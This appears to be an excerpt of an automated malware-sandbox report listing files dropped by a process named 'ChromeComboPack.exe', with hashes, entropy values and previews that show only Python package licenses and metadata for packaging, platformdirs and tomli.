                                                                                                                                                                                                                                            Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                                            MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                                            SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                                            SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                                            SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                                                            Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                                            MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                                            SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                                            SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                                            SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3204
                                                                                                                                                                                                                                            Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                                            MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                                            SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                                            SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                                            SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2565
                                                                                                                                                                                                                                            Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                                            MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                                            SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                                            SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                                            SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11429
                                                                                                                                                                                                                                            Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                                            MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                                            SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                                            SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                                            SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1642
                                                                                                                                                                                                                                            Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                                            MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                                            SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                                            SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                                            SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                                                            Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                                            MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                                            SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                                            SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                                            SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1089
                                                                                                                                                                                                                                            Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                                            SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                                            SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                                            SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1072
                                                                                                                                                                                                                                            Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                                            SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                                            SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                                            SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8875
                                                                                                                                                                                                                                            Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
                                                                                                                                                                                                                                            MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                                            SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                                            SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                                            SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):999
                                                                                                                                                                                                                                            Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                                            MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                                            SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                                            SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                                            SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                                            MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                                            SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                                            SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                                            SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
